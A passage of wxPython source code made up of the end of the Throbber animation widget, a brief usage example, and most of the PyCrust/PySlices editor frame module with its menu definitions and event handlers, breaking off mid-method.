# self.sequence can be changed, but it's not recommended doing it
# while the throbber is running. self.sequence[0] should always
# refer to whatever frame is to be shown when 'resting' and be sure
# that no item in self.sequence >= self.frames or < 0!!!
self.SetSequence(sequence)
self.SetClientSize((width, height))
timerID = wx.NewIdRef()
self.timer = wx.Timer(self, timerID)
self.Bind(EVT_UPDATE_THROBBER, self.Update)
self.Bind(wx.EVT_PAINT, self.OnPaint)
self.Bind(wx.EVT_TIMER, self.OnTimer, self.timer)
self.Bind(wx.EVT_WINDOW_DESTROY, self.OnDestroyWindow)
def DoGetBestSize(self):
"""
Get the best size of the widget.
:returns: the width and height
"""
return (self.width, self.height)
def OnTimer(self, event):
"""
Handles the ``wx.EVT_TIMER`` event for :class:`Throbber`.
:param `event`: a :class:`TimerEvent` event to be processed.
"""
wx.PostEvent(self, UpdateThrobberEvent())
def OnDestroyWindow(self, event):
"""
Handles the ``wx.EVT_WINDOW_DESTROY`` event for :class:`Throbber`.
:param `event`: a :class:`wx.WindowDestroyEvent` event to be processed.
"""
self.Stop()
event.Skip()
def Draw(self, dc):
"""
Draw the widget.
:param `dc`: the :class:`wx.DC` to draw on
"""
dc.DrawBitmap(self.submaps[self.sequence[self.current]], 0, 0, True)
if self.overlay and self.showOverlay:
dc.DrawBitmap(self.overlay, self.overlayX, self.overlayY, True)
if self.label and self.showLabel:
dc.DrawText(self.label, self.labelX, self.labelY)
dc.SetTextForeground(wx.WHITE)
dc.DrawText(self.label, self.labelX-1, self.labelY-1)
def OnPaint(self, event):
"""
Handles the ``wx.EVT_PAINT`` event for :class:`Throbber`.
:param `event`: a :class:`PaintEvent` event to be processed.
"""
self.Draw(wx.PaintDC(self))
event.Skip()
def Update(self, event):
"""
Handles the ``EVT_UPDATE_THROBBER`` event for :class:`ResizeWidget`.
:param `event`: a :class:`UpdateThrobberEvent` event to be processed.
"""
self.Next()
def Wrap(self):
"""Wrap the throbber around."""
if self.current >= len(self.sequence):
if self.autoReverse:
self.Reverse()
self.current = len(self.sequence) - 1
else:
self.current = 0
if self.current < 0:
if self.autoReverse:
self.Reverse()
self.current = 0
else:
self.current = len(self.sequence) - 1
self.Draw(wx.ClientDC(self))
# --------- public methods ---------
def SetFont(self, font):
"""
Set the font for the label.
:param `font`: the :class:`wx.Font` to use
"""
wx.Panel.SetFont(self, font)
self.SetLabel(self.label)
self.Draw(wx.ClientDC(self))
def Rest(self):
"""Stop the animation and return to frame 0."""
self.Stop()
self.current = self.rest
self.Draw(wx.ClientDC(self))
def Reverse(self):
"""Change the direction of the animation."""
self.direction = -self.direction
def Running(self):
"""Returns True if the animation is running."""
return self.running
def Start(self):
"""Start the animation."""
if not self.running:
self.running = not self.running
self.timer.Start(int(self.frameDelay * 1000))
def Stop(self):
"""Stop the animation."""
if self.running:
self.timer.Stop()
self.running = not self.running
def SetCurrent(self, current):
"""
Set current image.
:param int `current`: the index to the current image
"""
running = self.Running()
if not running:
#FIXME: need to make sure value is within range!!!
self.current = current
self.Draw(wx.ClientDC(self))
def SetRest(self, rest):
"""
Set rest image.
:param int `rest`: the index for the rest frame.
"""
self.rest = rest
def SetSequence(self, sequence = None):
"""
Order to display images in.
:param `sequence`: a sequence containing the order to display images in.
"""
# self.sequence can be changed, but it's not recommended doing it
# while the throbber is running. self.sequence[0] should always
# refer to whatever frame is to be shown when 'resting' and be sure
# that no item in self.sequence >= self.frames or < 0!!!
running = self.Running()
self.Stop()
if sequence is not None:
#FIXME: need to make sure values are within range!!!
self.sequence = sequence
else:
self.sequence = list(range(self.frames))
if running:
self.Start()
def Increment(self):
"""Display next image in sequence."""
self.current += 1
self.Wrap()
def Decrement(self):
"""Display previous image in sequence."""
self.current -= 1
self.Wrap()
def Next(self):
"""Display next image in sequence according to direction."""
self.current += self.direction
self.Wrap()
def Previous(self):
"""Display previous image in sequence according to direction."""
self.current -= self.direction
self.Wrap()
def SetFrameDelay(self, frameDelay = 0.05):
"""
Delay between each frame.
:param float `frameDelay`: the delay between frames.
"""
self.frameDelay = frameDelay
if self.running:
self.Stop()
self.Start()
def ToggleOverlay(self, state = None):
"""
Toggle the overlay image.
:param boolean `state`: set the overlay state or if None toggle state.
"""
if state is None:
self.showOverlay = not self.showOverlay
else:
self.showOverlay = state
self.Draw(wx.ClientDC(self))
def ToggleLabel(self, state = None):
"""
Toggle the label.
:param boolean `state`: set the label state or if None toggle state.
"""
if state is None:
self.showLabel = not self.showLabel
else:
self.showLabel = state
self.Draw(wx.ClientDC(self))
def SetLabel(self, label):
"""
Change the text of the label.
:param string `label`: the label text.
"""
self.label = label
if label:
extentX, extentY = self.GetTextExtent(label)
self.labelX = (self.width - extentX)/2
self.labelY = (self.height - extentY)/2
self.Draw(wx.ClientDC(self))
# ------------------------------------------------------------------------------
```
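A minimal usage sketch for the `Throbber` above, assuming a list of equally sized frame bitmaps; the PNG file names and the `DemoFrame` class are placeholders for illustration only.
```python
import wx
from wx.lib.throbber import Throbber


class DemoFrame(wx.Frame):
    def __init__(self):
        super(DemoFrame, self).__init__(None, title="Throbber demo")
        # Placeholder file names; any equally sized bitmaps will do.
        bitmaps = [wx.Bitmap(name) for name in
                   ("frame1.png", "frame2.png", "frame3.png")]
        self.throbber = Throbber(self, -1, bitmaps, frameDelay=0.1,
                                 label="working...")
        self.throbber.Start()


if __name__ == "__main__":
    app = wx.App(False)
    DemoFrame().Show()
    app.MainLoop()
```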
#### File: wx/py/frame.py
```python
__author__ = "<NAME> <<EMAIL>>"
import wx
import os
from .version import VERSION
from . import editwindow
from . import dispatcher
ID_NEW = wx.ID_NEW
ID_OPEN = wx.ID_OPEN
ID_REVERT = wx.ID_REVERT
ID_CLOSE = wx.ID_CLOSE
ID_SAVE = wx.ID_SAVE
ID_SAVEAS = wx.ID_SAVEAS
ID_PRINT = wx.ID_PRINT
ID_EXIT = wx.ID_EXIT
ID_UNDO = wx.ID_UNDO
ID_REDO = wx.ID_REDO
ID_CUT = wx.ID_CUT
ID_COPY = wx.ID_COPY
ID_PASTE = wx.ID_PASTE
ID_CLEAR = wx.ID_CLEAR
ID_SELECTALL = wx.ID_SELECTALL
ID_EMPTYBUFFER = wx.NewIdRef()
ID_ABOUT = wx.ID_ABOUT
ID_HELP = wx.NewIdRef()
ID_AUTOCOMP_SHOW = wx.NewIdRef()
ID_AUTOCOMP_MAGIC = wx.NewIdRef()
ID_AUTOCOMP_SINGLE = wx.NewIdRef()
ID_AUTOCOMP_DOUBLE = wx.NewIdRef()
ID_CALLTIPS_SHOW = wx.NewIdRef()
ID_CALLTIPS_INSERT = wx.NewIdRef()
ID_COPY_PLUS = wx.NewIdRef()
ID_NAMESPACE = wx.NewIdRef()
ID_PASTE_PLUS = wx.NewIdRef()
ID_WRAP = wx.NewIdRef()
ID_TOGGLE_MAXIMIZE = wx.NewIdRef()
ID_SHOW_LINENUMBERS = wx.NewIdRef()
ID_ENABLESHELLMODE = wx.NewIdRef()
ID_ENABLEAUTOSYMPY = wx.NewIdRef()
ID_AUTO_SAVESETTINGS = wx.NewIdRef()
ID_SAVEACOPY = wx.NewIdRef()
ID_SAVEHISTORY = wx.NewIdRef()
ID_SAVEHISTORYNOW = wx.NewIdRef()
ID_CLEARHISTORY = wx.NewIdRef()
ID_SAVESETTINGS = wx.NewIdRef()
ID_DELSETTINGSFILE = wx.NewIdRef()
ID_EDITSTARTUPSCRIPT = wx.NewIdRef()
ID_EXECSTARTUPSCRIPT = wx.NewIdRef()
ID_SHOWPYSLICESTUTORIAL = wx.NewIdRef()
ID_FIND = wx.ID_FIND
ID_FINDNEXT = wx.NewIdRef()
ID_FINDPREVIOUS = wx.NewIdRef()
ID_SHOWTOOLS = wx.NewIdRef()
ID_HIDEFOLDINGMARGIN = wx.NewIdRef()
class Frame(wx.Frame):
"""Frame with standard menu items."""
def __init__(self, parent=None, id=-1, title='Editor',
pos=wx.DefaultPosition, size=wx.DefaultSize,
style=wx.DEFAULT_FRAME_STYLE,shellName='PyCrust'):
"""Create a Frame instance."""
wx.Frame.__init__(self, parent, id, title, pos, size, style)
self.CreateStatusBar()
self.SetStatusText('Frame')
self.shellName=shellName
from . import images
self.SetIcon(images.getPyIcon(shellName=shellName))
self.__createMenus()
self.iconized = False
self.findDlg = None
self.findData = wx.FindReplaceData()
self.findData.SetFlags(wx.FR_DOWN)
self.Bind(wx.EVT_CLOSE, self.OnClose)
self.Bind(wx.EVT_ICONIZE, self.OnIconize)
def OnIconize(self, event):
"""Event handler for Iconize."""
self.iconized = event.Iconized()
def OnClose(self, event):
"""Event handler for closing."""
self.Destroy()
def __createMenus(self):
# File Menu
m = self.fileMenu = wx.Menu()
m.Append(ID_NEW, '&New \tCtrl+N',
'New file')
m.Append(ID_OPEN, '&Open... \tCtrl+O',
'Open file')
m.AppendSeparator()
m.Append(ID_REVERT, '&Revert \tCtrl+R',
'Revert to last saved version')
m.Append(ID_CLOSE, '&Close \tCtrl+W',
'Close file')
m.AppendSeparator()
m.Append(ID_SAVE, '&Save... \tCtrl+S',
'Save file')
m.Append(ID_SAVEAS, 'Save &As \tCtrl+Shift+S',
'Save file with new name')
if self.shellName in ['PySlices','SymPySlices']:
m.Append(ID_SAVEACOPY, 'Save A Cop&y',
'Save a copy of the file without changing the current file')
m.AppendSeparator()
m.Append(ID_PRINT, '&Print... \tCtrl+P',
'Print file')
m.AppendSeparator()
m.Append(ID_NAMESPACE, '&Update Namespace \tCtrl+Shift+N',
'Update namespace for autocompletion and calltips')
m.AppendSeparator()
m.Append(ID_EXIT, 'E&xit\tCtrl+Q', 'Exit Program')
# Edit
m = self.editMenu = wx.Menu()
m.Append(ID_UNDO, '&Undo \tCtrl+Z',
'Undo the last action')
m.Append(ID_REDO, '&Redo \tCtrl+Y',
'Redo the last undone action')
m.AppendSeparator()
m.Append(ID_CUT, 'Cu&t \tCtrl+X',
'Cut the selection')
m.Append(ID_COPY, '&Copy \tCtrl+C',
'Copy the selection')
m.Append(ID_COPY_PLUS, 'Cop&y Plus \tCtrl+Shift+C',
'Copy the selection - retaining prompts')
m.Append(ID_PASTE, '&Paste \tCtrl+V', 'Paste from clipboard')
m.Append(ID_PASTE_PLUS, 'Past&e Plus \tCtrl+Shift+V',
'Paste and run commands')
m.AppendSeparator()
m.Append(ID_CLEAR, 'Cle&ar',
'Delete the selection')
m.Append(ID_SELECTALL, 'Select A&ll \tCtrl+A',
'Select all text')
m.AppendSeparator()
m.Append(ID_EMPTYBUFFER, 'E&mpty Buffer...',
'Delete all the contents of the edit buffer')
m.Append(ID_FIND, '&Find Text... \tCtrl+F',
'Search for text in the edit buffer')
m.Append(ID_FINDNEXT, 'Find &Next \tCtrl+G',
'Find next instance of the search text')
m.Append(ID_FINDPREVIOUS, 'Find Pre&vious \tCtrl+Shift+G',
'Find previous instance of the search text')
# View
m = self.viewMenu = wx.Menu()
m.Append(ID_WRAP, '&Wrap Lines\tCtrl+Shift+W',
'Wrap lines at right edge', wx.ITEM_CHECK)
m.Append(ID_SHOW_LINENUMBERS, '&Show Line Numbers\tCtrl+Shift+L',
'Show Line Numbers', wx.ITEM_CHECK)
m.Append(ID_TOGGLE_MAXIMIZE, '&Toggle Maximize\tF11',
'Maximize/Restore Application')
if hasattr(self, 'ToggleTools'):
m.Append(ID_SHOWTOOLS,
'Show &Tools\tF4',
'Show the filling and other tools', wx.ITEM_CHECK)
if self.shellName in ['PySlices','SymPySlices']:
m.Append(ID_HIDEFOLDINGMARGIN,
'&Hide Folding Margin',
'Hide Folding Margin', wx.ITEM_CHECK)
# Options
m = self.autocompMenu = wx.Menu()
m.Append(ID_AUTOCOMP_SHOW, 'Show &Auto Completion\tCtrl+Shift+A',
'Show auto completion list', wx.ITEM_CHECK)
m.Append(ID_AUTOCOMP_MAGIC, 'Include &Magic Attributes\tCtrl+Shift+M',
'Include attributes visible to __getattr__ and __setattr__',
wx.ITEM_CHECK)
m.Append(ID_AUTOCOMP_SINGLE, 'Include Single &Underscores\tCtrl+Shift+U',
'Include attributes prefixed by a single underscore', wx.ITEM_CHECK)
m.Append(ID_AUTOCOMP_DOUBLE, 'Include &Double Underscores\tCtrl+Shift+D',
'Include attributes prefixed by a double underscore', wx.ITEM_CHECK)
m = self.calltipsMenu = wx.Menu()
m.Append(ID_CALLTIPS_SHOW, 'Show Call &Tips\tCtrl+Shift+T',
'Show call tips with argument signature and docstring', wx.ITEM_CHECK)
m.Append(ID_CALLTIPS_INSERT, '&Insert Call Tips\tCtrl+Shift+I',
'&Insert Call Tips', wx.ITEM_CHECK)
m = self.optionsMenu = wx.Menu()
m.AppendSubMenu(self.autocompMenu, '&Auto Completion',
'Auto Completion Options')
m.AppendSubMenu(self.calltipsMenu, '&Call Tips', 'Call Tip Options')
m.AppendSeparator()
self.historyMenu = wx.Menu()
self.historyMenu.Append(ID_SAVEHISTORY, '&Autosave History',
'Automatically save history on close', wx.ITEM_CHECK)
self.historyMenu.Append(ID_SAVEHISTORYNOW, '&Save History Now',
'Save history')
self.historyMenu.Append(ID_CLEARHISTORY, '&Clear History ',
'Clear history')
m.AppendSubMenu(self.historyMenu, "&History", "History Options")
self.startupMenu = wx.Menu()
self.startupMenu.Append(ID_EXECSTARTUPSCRIPT,
'E&xecute Startup Script',
'Execute Startup Script', wx.ITEM_CHECK)
self.startupMenu.Append(ID_EDITSTARTUPSCRIPT,
'&Edit Startup Script...',
'Edit Startup Script')
if self.shellName in ['PySlices','SymPySlices']:
self.startupMenu.Append(ID_SHOWPYSLICESTUTORIAL,
'&Show PySlices Tutorial',
'Show PySlices Tutorial', wx.ITEM_CHECK)
m.AppendSubMenu(self.startupMenu, '&Startup', 'Startup Options')
self.settingsMenu = wx.Menu()
if self.shellName in ['PySlices','SymPySlices']:
self.settingsMenu.Append(ID_ENABLESHELLMODE,
'&Enable Shell Mode',
'Enable Shell Mode', wx.ITEM_CHECK)
if self.shellName == 'SymPySlices':
self.settingsMenu.Append(ID_ENABLEAUTOSYMPY,
'&Enable "Auto-Sympy" Conversions for Undefined Variables',
'Enable "Auto-Sympy" Conversions', wx.ITEM_CHECK)
self.settingsMenu.Append(ID_AUTO_SAVESETTINGS,
'&Auto Save Settings',
'Automatically save settings on close', wx.ITEM_CHECK)
self.settingsMenu.Append(ID_SAVESETTINGS,
'&Save Settings',
'Save settings now')
self.settingsMenu.Append(ID_DELSETTINGSFILE,
'&Revert to default',
'Revert to the default settings')
m.AppendSubMenu(self.settingsMenu, '&Settings', 'Settings Options')
m = self.helpMenu = wx.Menu()
m.Append(ID_HELP, '&Help\tF1', 'Help!')
m.AppendSeparator()
m.Append(ID_ABOUT, '&About...', 'About this program')
b = self.menuBar = wx.MenuBar()
b.Append(self.fileMenu, '&File')
b.Append(self.editMenu, '&Edit')
b.Append(self.viewMenu, '&View')
b.Append(self.optionsMenu, '&Options')
b.Append(self.helpMenu, '&Help')
self.SetMenuBar(b)
self.Bind(wx.EVT_MENU, self.OnFileNew, id=ID_NEW)
self.Bind(wx.EVT_MENU, self.OnFileOpen, id=ID_OPEN)
self.Bind(wx.EVT_MENU, self.OnFileRevert, id=ID_REVERT)
self.Bind(wx.EVT_MENU, self.OnFileClose, id=ID_CLOSE)
self.Bind(wx.EVT_MENU, self.OnFileSave, id=ID_SAVE)
self.Bind(wx.EVT_MENU, self.OnFileSaveAs, id=ID_SAVEAS)
self.Bind(wx.EVT_MENU, self.OnFileSaveACopy, id=ID_SAVEACOPY)
self.Bind(wx.EVT_MENU, self.OnFileUpdateNamespace, id=ID_NAMESPACE)
self.Bind(wx.EVT_MENU, self.OnFilePrint, id=ID_PRINT)
self.Bind(wx.EVT_MENU, self.OnExit, id=ID_EXIT)
self.Bind(wx.EVT_MENU, self.OnUndo, id=ID_UNDO)
self.Bind(wx.EVT_MENU, self.OnRedo, id=ID_REDO)
self.Bind(wx.EVT_MENU, self.OnCut, id=ID_CUT)
self.Bind(wx.EVT_MENU, self.OnCopy, id=ID_COPY)
self.Bind(wx.EVT_MENU, self.OnCopyPlus, id=ID_COPY_PLUS)
self.Bind(wx.EVT_MENU, self.OnPaste, id=ID_PASTE)
self.Bind(wx.EVT_MENU, self.OnPastePlus, id=ID_PASTE_PLUS)
self.Bind(wx.EVT_MENU, self.OnClear, id=ID_CLEAR)
self.Bind(wx.EVT_MENU, self.OnSelectAll, id=ID_SELECTALL)
self.Bind(wx.EVT_MENU, self.OnEmptyBuffer, id=ID_EMPTYBUFFER)
self.Bind(wx.EVT_MENU, self.OnAbout, id=ID_ABOUT)
self.Bind(wx.EVT_MENU, self.OnHelp, id=ID_HELP)
self.Bind(wx.EVT_MENU, self.OnAutoCompleteShow, id=ID_AUTOCOMP_SHOW)
self.Bind(wx.EVT_MENU, self.OnAutoCompleteMagic, id=ID_AUTOCOMP_MAGIC)
self.Bind(wx.EVT_MENU, self.OnAutoCompleteSingle, id=ID_AUTOCOMP_SINGLE)
self.Bind(wx.EVT_MENU, self.OnAutoCompleteDouble, id=ID_AUTOCOMP_DOUBLE)
self.Bind(wx.EVT_MENU, self.OnCallTipsShow, id=ID_CALLTIPS_SHOW)
self.Bind(wx.EVT_MENU, self.OnCallTipsInsert, id=ID_CALLTIPS_INSERT)
self.Bind(wx.EVT_MENU, self.OnWrap, id=ID_WRAP)
self.Bind(wx.EVT_MENU, self.OnToggleMaximize, id=ID_TOGGLE_MAXIMIZE)
self.Bind(wx.EVT_MENU, self.OnShowLineNumbers, id=ID_SHOW_LINENUMBERS)
self.Bind(wx.EVT_MENU, self.OnEnableShellMode, id=ID_ENABLESHELLMODE)
self.Bind(wx.EVT_MENU, self.OnEnableAutoSympy, id=ID_ENABLEAUTOSYMPY)
self.Bind(wx.EVT_MENU, self.OnAutoSaveSettings, id=ID_AUTO_SAVESETTINGS)
self.Bind(wx.EVT_MENU, self.OnSaveHistory, id=ID_SAVEHISTORY)
self.Bind(wx.EVT_MENU, self.OnSaveHistoryNow, id=ID_SAVEHISTORYNOW)
self.Bind(wx.EVT_MENU, self.OnClearHistory, id=ID_CLEARHISTORY)
self.Bind(wx.EVT_MENU, self.OnSaveSettings, id=ID_SAVESETTINGS)
self.Bind(wx.EVT_MENU, self.OnDelSettingsFile, id=ID_DELSETTINGSFILE)
self.Bind(wx.EVT_MENU, self.OnEditStartupScript, id=ID_EDITSTARTUPSCRIPT)
self.Bind(wx.EVT_MENU, self.OnExecStartupScript, id=ID_EXECSTARTUPSCRIPT)
self.Bind(wx.EVT_MENU, self.OnShowPySlicesTutorial, id=ID_SHOWPYSLICESTUTORIAL)
self.Bind(wx.EVT_MENU, self.OnFindText, id=ID_FIND)
self.Bind(wx.EVT_MENU, self.OnFindNext, id=ID_FINDNEXT)
self.Bind(wx.EVT_MENU, self.OnFindPrevious, id=ID_FINDPREVIOUS)
self.Bind(wx.EVT_MENU, self.OnToggleTools, id=ID_SHOWTOOLS)
self.Bind(wx.EVT_MENU, self.OnHideFoldingMargin, id=ID_HIDEFOLDINGMARGIN)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_NEW)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_OPEN)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_REVERT)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_CLOSE)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_SAVE)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_SAVEAS)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_NAMESPACE)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_PRINT)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_UNDO)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_REDO)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_CUT)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_COPY)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_COPY_PLUS)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_PASTE)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_PASTE_PLUS)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_CLEAR)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_SELECTALL)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_EMPTYBUFFER)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_AUTOCOMP_SHOW)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_AUTOCOMP_MAGIC)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_AUTOCOMP_SINGLE)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_AUTOCOMP_DOUBLE)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_CALLTIPS_SHOW)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_CALLTIPS_INSERT)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_WRAP)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_SHOW_LINENUMBERS)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_ENABLESHELLMODE)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_ENABLEAUTOSYMPY)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_AUTO_SAVESETTINGS)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_SAVESETTINGS)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_DELSETTINGSFILE)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_EXECSTARTUPSCRIPT)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_SHOWPYSLICESTUTORIAL)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_SAVEHISTORY)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_SAVEHISTORYNOW)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_CLEARHISTORY)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_EDITSTARTUPSCRIPT)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_FIND)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_FINDNEXT)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_FINDPREVIOUS)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_SHOWTOOLS)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_HIDEFOLDINGMARGIN)
self.Bind(wx.EVT_ACTIVATE, self.OnActivate)
self.Bind(wx.EVT_FIND, self.OnFindNext)
self.Bind(wx.EVT_FIND_NEXT, self.OnFindNext)
self.Bind(wx.EVT_FIND_CLOSE, self.OnFindClose)
def OnShowLineNumbers(self, event):
win = wx.Window.FindFocus()
if hasattr(win, 'lineNumbers'):
win.lineNumbers = event.IsChecked()
win.setDisplayLineNumbers(win.lineNumbers)
def OnToggleMaximize(self, event):
self.Maximize(not self.IsMaximized())
def OnFileNew(self, event):
self.bufferNew()
def OnFileOpen(self, event):
self.bufferOpen()
def OnFileRevert(self, event):
self.bufferRevert()
def OnFileClose(self, event):
self.bufferClose()
def OnFileSave(self, event):
self.bufferSave()
def OnFileSaveAs(self, event):
self.bufferSaveAs()
def OnFileSaveACopy(self, event):
self.bufferSaveACopy()
def OnFileUpdateNamespace(self, event):
self.updateNamespace()
def OnFilePrint(self, event):
self.bufferPrint()
def OnExit(self, event):
self.Close(False)
def OnUndo(self, event):
win = wx.Window.FindFocus()
win.Undo()
def OnRedo(self, event):
win = wx.Window.FindFocus()
win.Redo()
def OnCut(self, event):
win = wx.Window.FindFocus()
win.Cut()
def OnCopy(self, event):
win = wx.Window.FindFocus()
win.Copy()
def OnCopyPlus(self, event):
win = wx.Window.FindFocus()
win.CopyWithPrompts()
def OnPaste(self, event):
win = wx.Window.FindFocus()
win.Paste()
def OnPastePlus(self, event):
win = wx.Window.FindFocus()
win.PasteAndRun()
def OnClear(self, event):
win = wx.Window.FindFocus()
win.Clear()
def OnEmptyBuffer(self, event):
win = wx.Window.FindFocus()
d = wx.MessageDialog(self,
"Are you sure you want to clear the edit buffer,\n"
"deleting all the text?",
"Empty Buffer", wx.OK | wx.CANCEL | wx.ICON_QUESTION)
answer = d.ShowModal()
d.Destroy()
if (answer == wx.ID_OK):
win.ClearAll()
if hasattr(win,'prompt'):
win.prompt()
def OnSelectAll(self, event):
win = wx.Window.FindFocus()
win.SelectAll()
def OnAbout(self, event):
"""Display an About window."""
title = 'About'
text = 'Your message here.'
dialog = wx.MessageDialog(self, text, title,
wx.OK | wx.ICON_INFORMATION)
dialog.ShowModal()
dialog.Destroy()
def OnHelp(self, event):
"""Display a Help window."""
title = 'Help'
text = "Type 'shell.help()' in the shell window."
dialog = wx.MessageDialog(self, text, title,
wx.OK | wx.ICON_INFORMATION)
dialog.ShowModal()
dialog.Destroy()
def OnAutoCompleteShow(self, event):
win = wx.Window.FindFocus()
win.autoComplete = event.IsChecked()
def OnAutoCompleteMagic(self, event):
win = wx.Window.FindFocus()
win.autoCompleteIncludeMagic = event.IsChecked()
def OnAutoCompleteSingle(self, event):
win = wx.Window.FindFocus()
win.autoCompleteIncludeSingle = event.IsChecked()
def OnAutoCompleteDouble(self, event):
win = wx.Window.FindFocus()
win.autoCompleteIncludeDouble = event.IsChecked()
def OnCallTipsShow(self, event):
win = wx.Window.FindFocus()
win.autoCallTip = event.IsChecked()
def OnCallTipsInsert(self, event):
win = wx.Window.FindFocus()
win.callTipInsert = event.IsChecked()
def OnWrap(self, event):
win = wx.Window.FindFocus()
win.SetWrapMode(event.IsChecked())
wx.CallLater(1, self.shell.EnsureCaretVisible)
def OnSaveHistory(self, event):
self.autoSaveHistory = event.IsChecked()
def OnSaveHistoryNow(self, event):
self.SaveHistory()
def OnClearHistory(self, event):
self.shell.clearHistory()
def OnEnableShellMode(self, event):
self.enableShellMode = event.IsChecked()
def OnEnableAutoSympy(self, event):
self.enableAutoSympy = event.IsChecked()
def OnHideFoldingMargin(self, event):
self.hideFoldingMargin = event.IsChecked()
def OnAutoSaveSettings(self, event):
self.autoSaveSettings = event.IsChecked()
def OnSaveSettings(self, event):
self.DoSaveSettings()
def OnDelSettingsFile(self, event):
if self.config is not None:
d = wx.MessageDialog(
self, "Do you want to revert to the default settings?\n" +
"A restart is needed for the change to take effect",
"Warning", wx.OK | wx.CANCEL | wx.ICON_QUESTION)
answer = d.ShowModal()
d.Destroy()
if (answer == wx.ID_OK):
self.config.DeleteAll()
self.LoadSettings()
def OnEditStartupScript(self, event):
if hasattr(self, 'EditStartupScript'):
self.EditStartupScript()
def OnExecStartupScript(self, event):
self.execStartupScript = event.IsChecked()
self.SaveSettings(force=True)
def OnShowPySlicesTutorial(self,event):
self.showPySlicesTutorial = event.IsChecked()
self.SaveSettings(force=True)
def OnFindText(self, event):
if self.findDlg is not None:
return
win = wx.Window.FindFocus()
if self.shellName == 'PyCrust':
self.findDlg = wx.FindReplaceDialog(win, self.findData,
"Find",wx.FR_NOWHOLEWORD)
else:
self.findDlg = wx.FindReplaceDialog(win, self.findData,
"Find & Replace", wx.FR_NOWHOLEWORD|wx.FR_REPLACEDIALOG)
self.findDlg.Show()
def OnFindNext(self, event,backward=False):
if backward and (self.findData.GetFlags() & wx.FR_DOWN):
self.findData.SetFlags( self.findData.GetFlags() ^ wx.FR_DOWN )
elif not backward and not (self.findData.GetFlags() & wx.FR_DOWN):
self.findData.SetFlags( self.findData.GetFlags() ^ wx.FR_DOWN )
if not self.findData.GetFindString():
self.OnFindText(event)
return
if isinstance(event, wx.FindDialogEvent):
win = self.findDlg.GetParent()
else:
win = wx.Window.FindFocus()
win.DoFindNext(self.findData, self.findDlg)
if self.findDlg is not None:
self.OnFindClose(None)
def OnFindPrevious(self, event):
self.OnFindNext(event,backward=True)
def OnFindClose(self, event):
self.findDlg.Destroy()
self.findDlg = None
def OnToggleTools(self, event):
self.ToggleTools()
def OnUpdateMenu(self, event):
"""Update menu items based on current status and context."""
win = wx.Window.FindFocus()
id = event.GetId()
event.Enable(True)
try:
if id == ID_NEW:
event.Enable(hasattr(self, 'bufferNew'))
elif id == ID_OPEN:
event.Enable(hasattr(self, 'bufferOpen'))
elif id == ID_REVERT:
event.Enable(hasattr(self, 'bufferRevert')
and self.hasBuffer())
elif id == ID_CLOSE:
event.Enable(hasattr(self, 'bufferClose')
and self.hasBuffer())
elif id == ID_SAVE:
event.Enable(hasattr(self, 'bufferSave')
and self.bufferHasChanged())
elif id == ID_SAVEAS:
event.Enable(hasattr(self, 'bufferSaveAs')
and self.hasBuffer())
elif id == ID_SAVEACOPY:
event.Enable(hasattr(self, 'bufferSaveACopy')
and self.hasBuffer())
elif id == ID_NAMESPACE:
event.Enable(hasattr(self, 'updateNamespace')
and self.hasBuffer())
elif id == ID_PRINT:
event.Enable(hasattr(self, 'bufferPrint')
and self.hasBuffer())
elif id == ID_UNDO:
event.Enable(win.CanUndo())
elif id == ID_REDO:
event.Enable(win.CanRedo())
elif id == ID_CUT:
event.Enable(win.CanCut())
elif id == ID_COPY:
event.Enable(win.CanCopy())
